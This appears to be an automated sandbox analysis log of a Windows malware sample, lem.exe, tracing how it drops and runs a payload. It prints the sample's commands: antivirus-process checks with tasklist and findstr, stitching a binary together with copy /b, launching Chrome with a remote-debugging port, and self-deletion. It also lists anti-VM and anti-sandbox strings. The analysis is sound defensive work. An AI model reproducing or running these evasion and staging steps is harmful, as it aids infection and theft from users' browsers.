            Source: C:\Users\user\Desktop\lem.exeFile read: C:\Users\user\Desktop\lem.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\lem.exe "C:\Users\user\Desktop\lem.exe"
            Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com u
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2136,i,3268982340233252329,5354050458271203649,262144 /prefetch:8
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\628056\Corrections.com" & rd /s /q "C:\ProgramData\2N7Y58YCJW47" & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative uJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com uJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\628056\Corrections.com" & rd /s /q "C:\ProgramData\2N7Y58YCJW47" & exitJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2136,i,3268982340233252329,5354050458271203649,262144 /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: dbghelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: windows.fileexplorer.common.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\lem.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: lem.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: cryptosetup.pdbGCTL source: Corrections.com, 0000000A.00000002.2820141571.00000000045B4000.00000004.00000800.00020000.00000000.sdmp, TR9Z5X.10.dr
            Source: Binary string: cryptosetup.pdb source: Corrections.com, 0000000A.00000002.2820141571.00000000045B4000.00000004.00000800.00020000.00000000.sdmp, TR9Z5X.10.dr
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: lem.exeStatic PE information: real checksum: 0xee8db should be: 0xefc4d
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00940DE6 push ecx; ret 10_2_00940DF9

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\628056\Corrections.comJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\628056\Corrections.comJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile created: C:\ProgramData\2N7Y58YCJW47\TR9Z5XJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile created: C:\ProgramData\2N7Y58YCJW47\TR9Z5XJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile created: C:\ProgramData\2N7Y58YCJW47\TR9Z5XJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009B26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_009B26DD
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0093FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_0093FC7C
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_10-104136
            Source: Corrections.com, 0000000A.00000002.2823074845.0000000004BE1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
            Source: Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comDropped PE file which has not been started: C:\ProgramData\2N7Y58YCJW47\TR9Z5XJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\timeout.exe TID: 7136Thread sleep count: 86 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0098DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0098DC54
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0099A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0099A087
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0099A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0099A1E2
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0098E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_0098E472
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0099A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_0099A570
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009966DC FindFirstFileW,FindNextFileW,FindClose,10_2_009966DC
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0095C622 FindFirstFileExW,10_2_0095C622
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_009973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_009973D4
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00997333 FindFirstFileW,FindClose,10_2_00997333
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_0098D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0098D921
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 10_2_00925FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00925FC8
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\628056\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\628056Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: Corrections.com, 0000000A.00000003.1925513732.0000000004431000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVM
            Source: Corrections.com, 0000000A.00000002.2819153926.0000000001B8A000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2819153926.0000000001B09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
